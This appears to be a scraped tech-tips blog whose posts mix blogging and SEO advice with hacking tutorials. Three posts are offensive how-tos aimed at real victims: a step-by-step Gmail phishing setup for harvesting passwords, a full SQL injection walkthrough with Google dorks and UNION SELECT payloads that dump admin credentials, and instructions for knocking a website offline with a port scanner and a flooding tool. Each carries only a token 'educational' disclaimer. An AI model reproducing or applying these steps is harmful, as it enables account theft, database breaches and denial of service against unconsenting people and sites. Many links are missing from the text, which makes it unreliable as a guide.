Make The Website Professional

Today, I am going to show you how easy it is to create a professional-looking Flash website for free.

Know To Spread The Web

So you've made a new site, huh? But no one knows about it! Here you will find tips to spread news about a website that you've created!.

The Path To Be An Expert Geek

In this website one can find many TIPS AND TRICKS of Computer,Internet,Web,Mobile And Blogger Tips.

To Increase The Knowledge Of Bloggers

In This Site We Want To Increase The Knowledge Of Bloggers About Blogging To Be A Better Blogger.

How To make Money Online With Your own Website

If you look at many websites, you will probably notice that there are banner advertisements displayed on most pages. If you are a newcomer to the scene, you might think that you must either be a company or that your site must be famous before you can get advertisers, just as it is the case in hardcopy publications..

Wednesday, June 10, 2015

Path 2 know about the author of TECH OF TWIST


How To Do Anything !!!!
BIPUL is a 20 year old guy, currently living in Faridabad, India. He is Founder Of TECHOFTWIST Blog.

 Started blogging in 2015. Almost a decade before that, some of my friends tried to persuade me to start blogging. But I resisted.
You see, I love blogging. In fact, I enjoy it more than writing books. It’s far less tedious, takes less time, and affords instant feedback.

The purpose of publishing TOT BLOG was to provide high quality Blogger tutorials, widgets, Hacking , practical SEO tips and many more How to's articles. 
Each post is published with a hope so that every blogger may be able to turn his free Blog template into a $300 worth professional template and may earn a healthy living online. The proof is the template that he is running at the moment.

Techoftwist's advice to new Bloggers:

Recently, my Friend asked my advice on starting a blog. What I told her is very different from what I would have said a year ago. Many experienced bloggers might disagree with me, but I thought I would share my advice here.

When you first start blogging, there can be a lot of pressure on your shoulders. 
You’ve probably read a variety of posts on what you should be doing and how you should be doing it to get started. And, more likely than not, most of these posts will have confused you, as they all say different things.
While there are certainly things you should be doing when you begin blogging, there are also a number of things you don’t need to do. Here are 7 of the most common pieces of advice that you don’t necessarily need to follow.


There is no point is spending hours creating content when nobody’s looking anyway. And sometimes that’s not a bad thing either.
Remember, in the initial days you are testing the waters and you are bound to make mistakes. There is no need for the whole world to know.
Spend more time educating yourself about all aspects of blogging; design, content, promotion, marketing, SEO, etc.
Spend one third of your time creating content. Spend the rest of the time learning about what it takes to sustain a successful blog, developing meaningful connections with fellow bloggers and writing guest posts.
Comment away, but comment for the right reason.
If you have this notion at the back of your mind that you are commenting to drive people to your own blog, then you are writing for the wrong person – the other reader. You need to be commenting for the author of the post.
Comment when you have something valuable to add.
Comment even when you just feel like saying ‘awesome post’.
You might have read that bloggers don’t like receiving comments that just say things like that. I don’t know about others, but I sure do. I dig them.
Go ahead and say that if you want to, only don’t always expect to have a long response from the blogger.
Leave a comment when you want to let the blogger know that you enjoy their posts and you think of them as a friend, perhaps a mentor. If you are being genuine (and bloggers can always sense that), they will love you for that.
If you are new, this is what you believe, right?
If you have been at it for a while, you know this is simply not true, at least not any more.
In the beginning there were a few talented bloggers, but now there are many. Before there was a low supply of excellent writers, now it is huge. And it is becoming impossible to stand out with your content alone.
It is when you have allies in the blogging world who help spread your content that people sit up and take notice. Once you have reached that stage, you can relax and focus on your content only. Then it will be the right time.
People find blogs through “Word of Blog”, not by searching through millions of blogs listed in catalogues.
I admit I submitted mine to a few when I started out. I have yet to see any traffic from these places.
This is how I find blogs:
  • I look at the blogroll of the blogs I am interested in.
  • I find it through the links on the blog.
  • I follow a guest poster’s links to their own blogs.
  • I look at the retweets of bloggers I follow closely, and always find great blogs through that.
  • I very occasionally find blogs through comments.
There are many A list Wannabe bloggers who mimic the influencers. There is one big difference though; they keep telling you how they got from 19 subscribers to 6000 subscribers in 6 months.
Firstly, it’s hard to believe. Most probably these so called A-list bloggers are not counting from when they first started blogging. They are not taking into account the time taken to learn everything and form connections with other bloggers.

Do that, and all will be well.

Getting Traffic To Your Blog – Know 2 Make Your Blog Popular

Blogging is one of the best ways to make money online. The problem most people face is getting traffic to your blog and making money out of that traffic. Almost everyone knows what a blog is but very few people know how to make most out their blogs.
If you’re thinking of starting a blog, or if you already have one and just want to increase your traffic this article will show you how to make your blog popular and get traffic to it.
These tips are valid for any blogger whether they are newbies or blogging experts. Writing quality content is the way to go and almost the only way to become a popular blogger. Make sure to follow these tips and you will be a better blogger a few weeks from now!

know 2 Get Free Domain Name .

This domain name is getting popular among free providers.more than 110000 domains already registered! dotfree is a proposed new top level domain (TLD).

To register yourself at .free follow these simple steps:

  • Visit
  • check availability for your .free domain
  • Register for your domain name.

A new domain name for you a professional  looking domain .mp that also provides free hosting. if you want your free .mp domain name Simply follow the steps

  • Friends just visit
  • Check for the availability for your domain.
  • Complete sign-up process.
  • And now you have your free .mp domain name. 

Want your own website or url redirection in minutes professional domain name like or searching for free domain? or free hosting i have found some free domain names.Simply follow the steps                        

  • Visit the website or 
  • Check for the availability of your domain.
  • Register your account
  • Now you have got your free domain hosting or url redirection.

Best domain name .tk , no adds and free hosting and url redirection(redirects to your website)
to get your free .tk domain just follow these simple steps:

  • Visit
  • Check for your domain names
  • Create account and redirect or host your domain name for free.

3 Important Mistakes that could bring “THE END” of your blog

Blogging is not only commonplace but it can also be a key component in online business success.
Why has it become such a phenomenon? No doubt the convenience plays a major role. Blogs can be easily be set up and used. Also unlike traditional website building, blogs require mostly very less technical expertise which means no fooling around with HTML and PHP codes and the like.
Blogging is that powerful tool which gives people the voice to be heard by others. On Blogs you can post your thoughts on any topic from around the world you wish and can instantly have a worldwide audience to read it. You will get to know about their opinions if they comment on it. Not only this is more interactive than the traditional website but search engines also looks at comments on your blog as fresh content.
However like everything else in life, there is a flip side of this. To make blogging work for you there are some things you need to keep in mind always which I have listed below:

Blogger post does not appear in Google search engine

With every new algorithm, we have to make our self aware with updated algorithm, As Google changes things quickly and if you are not watching Google regularly then you are among the back benchers. So, getting your blog at front becomes difficult for you. Be, watchful while creating and managing a blogger website.
Coming back to the original topic, Why My Blogger post does not appear in Google search engine? The reason of it exist within the Google search engine and it is explained as follows-

Path 2 Monitor Time Spent On Different Websites (in Chrome only )

It is hard not to waste time online. With so many distractions on the Internet, if you don’t have a strong will or some kind of time management strategy, your productivity takes a serious hit.
Try this chrome extension and monitor your time usage !!!!

The extension attempts to detect user activity (by mouse movements) and will pause the timer if the user is not at the keyboard.
Download AddOns For Google Chrome:

Know Run Untrusted Programs without any Fear Using Sandboxie

I know many people who put their full trust on their Anti-Virus program. Sometimes Antivirus scanner reports that a program is infected with a Virus or Trojan, even when the program is not really infected with any malicious code. This kind of problem is known as “False Positive” or “False Alert“. I can’t blame people who accuse a program as virus whenever their antivirus reports a legitimate program as virus because they are not geeks who know how to test and see what the program does to their computer.
Few months ago I learned about a program that is able to create a virtual space in which the untrusted programs can safely run. Usually when you accidentally run a virus, it will start spreading and modify your system. But in this case, if I run the virus in the virtual space, it won’t affect your system at all and I know what it CAN do to my system.
I hope that after you’ve finished reading this article, you will no longer have worries running untrusted programs.

know 2 Boot from USB Stick when Your Computer/Laptop Doesn’t Support it!

You might want to boot from a USB device, like an external hard drive or a flash drive, for many different reasons.
When you boot from a USB device, what you're actually doing is running your computer with the operating system that's installed on the USB device. When you start your computer normally, you're running with the operating system installed on your hard drive - Windows, Linux, etc.
Follow these easy steps to boot from a flash drive, an external hard drive, or some other bootable USB device.

Tips to build a Community around yourself and your blog

Blogging is all about sharing. You share what interests you, what you want to tell your potential customers, your products, hooks etc.
And your sharing mission will go in vain if no one gets your message. Do you know what I mean? Imagine yourself playing a rocking music which is really amazing on a stage in front of no audience. A blog without community is just like that.
You put your most important, and valuable content out there but if there’s no one who reads it, shares it and comments on it, then what’s the use? The whole purpose of blogging goes void.
By all means you need a community around your blog and yourself, if you run a blog as a business or a promoter of your business. With a vibrant community you can expect that;
  1. Your blog posts naturally reach your community (the first tier).
  2. Your blog posts get shared by the community to their friends/fans/followers, which is multiple times of exposure to your content (other than the first tier; there can be multiple tiers here).
  3. Your blog posts go viral {as a result of (1) and (2)}.
  4. You easily become an authority in your niche (if your content is really worthwhile).
  5. Make money online – finally, ha!
As you can see, your blogging success greatly depends on the community you build around yourself and your blog.
Without further delay, let me tell you 5 powerful ways in which you can build a community around yourself and your blog.

Know 2 Make your Blogger Content Safe

Make your Blogger Content Safe:

Know 2 Increase Visitors to Website after Pinging

Using Ping Service is one simple way of Search Engine Optimization. This is for tell them about your weblog or website has update. So your visitors number will increase.
But remember, you must just pinging one time on a day with some update in your blog. And if you doing ping more than 1 of a day or without blog update, maybe you doing Spam (you called Spammer) and they will blocking your ping next time. So be careful for this Blogger Trick.
Here I have Ping Service List for you.
  • My Page Rank

  • Pingoat

  • Ping-O-Matric

Know 2 Get Free Softwares For Hacking

There is a lot of free hacking software on the Internet. Some examples of free hacking software are: Cain and Able, Ophcrack, and Wireshark. 

I have personally used all three of these programs and they are all exceptional, especially Ophcrack because it does almost everything for you. There are many types of hacking softwarethat are available for free and you should give some thought to which types of hacking software you want.       
Cain and Able can crack many different codes and decrypt passwords. To download this program, go to: Next, click on the download link to the latest version of this free hacking software and install it on your computer. 

Know 2 Convert TV as a Monitor or Computer to TV Cable

Many a time I have looked over at my 32" television and thought, why can't I just hook up my computer to that thing and play my PC games on a huge screen? I figured it would beat buying a huge computer monitor for a ton of cash, right? I mean, I can already watch TV on my computer by using Pro Video 2008 -why can't I just switch it around?

Well, I looked into it and it can be done. In fact, more and more homes are using a TV screen as a computer monitor. You can now watch movies, download on-demand movies from places like Netflix, watch YouTube videos on a big screen, watch a slide show of your own stored digital images, view home videos and more! For most folks, it is just a matter of hooking up some cables or using a converter. For others, WiFi may be used in the connection. Either way, there can be some limitations.
This article will explain how to get started -- as well as the benefits and limitations -- so you can decide for yourself if using your TV as a computer monitor is worth your while.

Know 2 Hack Gmail Through Phishing

Hi friends I hope you all are fine today I am going to post on article for “How To Hack Gmail Accounts” using Smart Gmail Phishing. Their are many Gmail Phisher available on net but I must say they all are outdated and most of them are detected, So I though to create a new Gmail Phisher which is very new and also created by me.

This article is for educational purpose only, We want to make you aware how hacking is done, So don’t misuse this hacking tricks. We are not responsible for any wrong thing done by you. This How To Hack An Email Is Just A Demo. 

Steps To Hack Gmail Account :-

1. Download Gmail Phisher Gmail Phiser ^ bcoders (New And Updated Gmail Phishing Page)
    password :
2. This is compressed in .zip so first extract the folder to desktop
3. Upload all three files to Or Any Other Hosting sites
    To know how to upload file to a web hosting site wait for my next post .
4. Now shorten ( in every time for new victim .
5. Now, you have to send this link to victim and make him login to our fake phishing page.
6. Once you came to know that victim logined to our Gmail Phishing Page then check log.txt.
7. In log.txt you will see his username and password .

All steps are done, By this method you can Hack Any Gmail Account Easily. But still we are one step behind. Its easy to create and set up a Phisher, Its bit hard to trap victim in our phisher. You have create new ideas which chatting and mean while have to trap victim. This method is known as Smart Phishing or Smart Gmail Phisher. By this you can Hack Gmail Account For Free
How To Defense From Phishing ?
Never enter your account information to the unknown webpage, always check the address bar and thus the webpage real address. 
So friends, I hope you enjoyed this New Gmail Phishing to Hack Accounts.If u have any problem regading this just leave a comment 

Know 2 Hack Website Using SQL injection By Following These Steps

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.

Some List of Database are:

* DB servers,
* MySQL(Open source),
* Oracle,
* Postgre SQL(open source),
* SQLite,

Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:
Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.

Note:if you like to hack particular website,then try this: dork_list_commands
for eg: inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:'
 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number andorder by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg: order by 1 order by 2 order by 3 order by 4
 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean: order by 1(noerror) order by 2(noerror) order by 3(noerror) order by 4(noerror) order by 5(noerror) order by 6(noerror) order by 7(noerror) order by 8(error)

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg: order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow: union select 1,2,3,4,5,6,7--

If the above method is not working then try this: and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:

Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg: and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg: and 1=2 union select 1,2,database(),4,5,6,7-- and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this: and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg: and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
 Now it will show the list of table names. Find the table name which is related with the admin or user.

Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.

Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg: and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.


If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:
If you have luck ,you will find the admin page using above urls.

This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing.

Know 2 Access Facebook on Any Mobile Without GPRS or Internet Connection

Accessing Facebook without Internet or GPRS on mobile is nothing new. Back in May 2011, we reportedthat a Singapore-based software applications development company, U2opia Mobile, had developed an application for mobile phones that will allow users to access Facebook without paying for a data connection and works well on all handsets.
Now, the application is fully functional, and the company is marketing the product with the nameFonetwish. Facebook India has teamed up with U2opia to allow its Indian user base to access the network for free without requiring any Internet connection. Yes, you can now use Facebook with your old Nokiaphone (Including Nokia 1100).
The application has been developed using Unstructured Supplementary Service Data (USSD) technology. Technically, USSD is a protocol used by GSM telephones to communicate with the service providers. The best example for this would the balance inquiry system.
Fonetwish works in a similar fashion. There is no graphical user interface as such, and you cannot view any graphical content. The service can only be used to read/send text based updates.

Know 2 Hack and Crash Website by IP address

Your friend or your enemy has made a little shitty website for whatever maybe a private server or anything.. And your feeling devious and want to crash it
Port Scanner
HotSpotSheild Proxy!
Step One: First we need to find the websites IP Adress. This is very easy todo. Ok so say they URL is ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type ping press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /’s)

Step Two: Now we must test to see if port 80 is open (it usually is).
This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you todo a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.
[X] = Closed
[X] Vulnerable = Open

The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!
Ok open Up rDos that you download.
Enter your victims ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *=Flooding -=Crashed Or didn’t connect!
Thanks for reading i hope this helps 

Know 2 Create Own Mobile Network That Actuallu Works

As odious as it is to start another article by mentioning the iPhone, it's there we need to begin. People have essayed at length on the effects the Apple phone has had on the handset market but there's been just as an important by-product issue that's arisen at the same time.
With everyone rushing to O2 in the UK and AT&T in the States for contracts when the iPhone was an exclusive, there began to growl low grumblings about the quality of service that these networks were providing. The grumblings grew to whingings and the whingings to some fairly direct internet spleen venting which has only disappeared since the likes of Orange and Vodafone have offered an alternative.

Now whether or not these networks were particularly at fault, whether they were victims of their own success or whether the iPhone itself has antenna problems is another issue but the fact is that it's the first time since the mobile telephony took off that mass focus has switched back to call quality. So, then what are the key elements that make a mobile network perform properly and why is it that some operators are just better than others? If you're ready and sitting comfortably, then we'll tell you how it works.

The Core Network

At the heart of all the mobile operators sits the core network. It's a series of networked computer switches that have taken over the roll of the old school scenario of a women with thick rimmed glasses and her hair tied up circa 1920 plugging leads in and out of a board. Each switch has a number of set cell towers associated with it and when a call comes through, it's job is to route that call through to the right switch which is associated with the tower that happens to be nearest the person the caller is trying to get hold of. It does this by passing the call through the network from switch to switch using the shortest possible route.

In order to do this, the core network needs to know where all the numbers are at any one time so that it knows to go to the right switch to route the call correctly, so part of the job is to keep track of your mobile phone, and therefore you, wherever you go. Every time you move from the range of one cell tower to another, there are signals sent back and forth to make sure that the core knows where to find you. Another important function of the core is, of course, to charge you for making the calls in the first place.

Essentially, the core network is where all the intelligence in the system lies and when a network goes down, this is going to be where the problem is. Complications arise when the switches, or the connections between them, start to fail. Other switches can then re-route around the problem by taking calls via another pathway through the network of switches but that increases the traffic load on those other routes that can then lead to further problems and potentially more crashes.

On top of that there's also the problem that most networks have two cores - one for the 2G network and one for 3G. That's all very well and good but that can also lead to issues when switching between the two with calls being dropped and sleeping phones which fall off the radar altogether for periods of time.

So, if you want a core network that's going to offer quality, then one idea is to do something like Vodafone has done. The Newbury-based company has just completed a 3-year overhaul of their core to arrive on the other side with a single unified network dealing with both 2G and high speed data services as well. What's more, it's designed with the switches connected in units of pools of six. The idea is that it's a more stable structure with more interconnections that's also now highly scalable. So far, they're the only network in the UK to have done it adding more backing to their market position of service quality even if they might be surpassed in customer base by O2 and a merged Orange/T-Mobile.

Backhaul Transmission

A solid core is all very well and good but for a mobile network to really deliver, it has to be good from end to end. One weak link ruins the lot. So, to get the data safely between the core and the cell towers, you need a big, fat, bit-pipe of sorts. You can do that using microwave dishes sending signals from A to B over the air or you can hard wire the connections using copper or fibre. Naturally, you'll get a better performance out of a hard connection but then it costs a lot to lay all the cable. So how does a good network solve the problem?

Well, taking Vodafone again as an example, it's got round the issue by signing an agreement to use BT's already existing Ethernet connections which offer space for 60Mbps service. Vodafone doesn't have a 60Mbps system, nor are there any mobile devices that can use those kinds of speeds but the idea is that there's plenty of room for growth and absolutely no chance of a bottle neck in the backhaul system either now or in the near future.

Once you've got your connection choice sorted, what you really don't want to do, if aspiring to be a quality network, is to set it up such that your cell towers are all connected together in series of long daisy chains from your core network across the length of the country. Then all you need is one link up or tower to go and you can kiss goodbye to everything from Darlington to Dundee. Instead, you build in resilience by having you backhaul connections spreading out in rings with a series of failsafe loops and link-ups thrown in for good measure too. That should keep things nice and stable.

Cell Towers

The final link in your mobile network chain is the cell towers themselves. If your customers are using substandard phones with substandard built-in antennas, there's not a lot you can do about that, except tell manufacturers if you're getting consistent complaints about their handsets and, yes, this does happen.

Cell towers equal coverage and that's one of the first complaints your users might have. It's a fairly simple mathematic, the more of them you have, the better your coverage is. On top of that, there's also capacity to consider. Any one cell tower can only provide so much bandwidth for people to use.Eventually, if you've got too many people in one area trying to use the signal from the same tower, the load is going to become too much. Think trying to make a call, send a text or get online at a music or sporting event surrounded by thousands of others in the same place trying to do the same.
So, to build a good network, you not only need lots of towers spreading out all over the UK with all the backhaul to connect them up but you also have to pack them into urban areas as well. If you're really smart, then have a battalion of movable cell towers as well which can be used for special events to try to alleviate the classic half time problem at football games and such. You'll also need some pretty creative solutions when something as big as the Olympics or the World Cup hits town.
You've also got some decisions to make. The mobile network in the UK works at two different frequency groups. The first is 900MHz and the second 1800MHz and you can deploy masts working at either one. The issue is that 900 has a longer wavelength which means that its signal can travel further and with greater penetration through buildings and other objects but it's the 1800 frequency that delivers all the high speed 3G data traffic.
The temptation is to save the 900 towers for the countryside where you're looking to cover as much ground as possible and keep the 1800 for the cities where you're more worried about capacity. Unfortunately, that's why you don't get much 3G in rural areas and that particularly thick buildings in towns can sometimes block your signals. So, there's a bit of a balancing act if you want to get as best for the average user as possible.

Beyond that, the amount of spectrum you have and whether it's in one big block or several chunks makes a big difference for capacity and ultimately speed of service too. Although the frequencies are referred to as 900MHz and 1800MHz, they actually represent a range between 890MHz or so and 910MHz or so and likewise for the band of 1800. The mini spectrum is then divvied up between all the operators.
To make sure that your chunks don't get any interference from the other networks with neighbouring chunks of their own, you have to devote the outer portions of your allocation to dead zones of around 100KHz known as Guard Bands which simply act as buffers. Now, that's bandwidth that you might rather be using to carry your signals.

So, if you're lucky enough to have just one large piece of spectrum, then you only have two of these - one at either end - wasting just 200KHz. If you have lots of smaller sections to manage, then you're going to use up a lot more, and what that boils down to is less capacity at each site which translates to less speed per given number of people trying to use it. This was one of the major competition issues of the merger between Orange and T-Mobile. Once together, it offers larger sections of this sought after contiguous bandwidth, making it increasingly hard for others to keep up but also an interesting choice for mobile broadband users looking for high speed access.


Now next time you get annoyed with the reception on your phone you might have a better idea of what's going on. If you're getting dropped calls or generally not so hot service wherever you go, there's a good chance that your provider could do with updating its core network.
When you lose the signal in the basement or the kitchen of your town house, there's a good chance that you're working on a 1800MHz cell tower. The real key to having a perfect network though is for all three of the areas above to be put together with care, attention and probably lots of money as well. It has to be an end to end solution otherwise one issue will ruin the whole chain.

After that, you have to hope that your quality network has some cash left to ensure access to the top mobiles as well. Either that or it's one of the best reasons to buy the phone you're after out right and go SIM-only on the operator who gives you the best service.

Download Youtube Videos Without Any Softwares

Finding a good piece of software to download streaming videos, especially for free, is not an easy task. If using a public computer, such as those at an office or school, installing software is not an option anyway. allows you to download videos from YouTube and other video sites for free, without downloading and installing any kind of software.  The interface is straight forward and easy to use, so even the least tech-savvy among us can enjoy videos featuring cats on skateboards for many future years.
First, find the YouTube video you want to watch. Either on the right side of the page or directly under the video is a box that says URL beside it. Select the contents of the box and copy it with ctrl+C.

In your browser’s address bar, type When the site appears, paste your YouTube URL into the box that says URL and click Download.

You may then be asked to copy the letters from one of those super-annoying visual generators that are supposed to prove you are human. Yeah, like a computer would share your secret love of Lady Gagavideos! Anyway, if asked, oblige by copying the code, and click next.
KeepVid always gives at least two download options for your videos, depending on the original quality of the video. For the Lady Gaga example above, we are given four options from which to choose: three of those options save the file as a FLV file, while the last saves as an MP4.
If concerned about file size, the FLV options are nice. But, if you plan on using the video in a PowerPoint presentation, MP4 is the only format on this list that will play within PowerPoint easily. Click the link next to your choice.
Choose a destination for your video file as you would with any other download, and depending on your internet connection, you can be watching Lady Gaga and skateboarding felines on your machine within 1-10 minutes.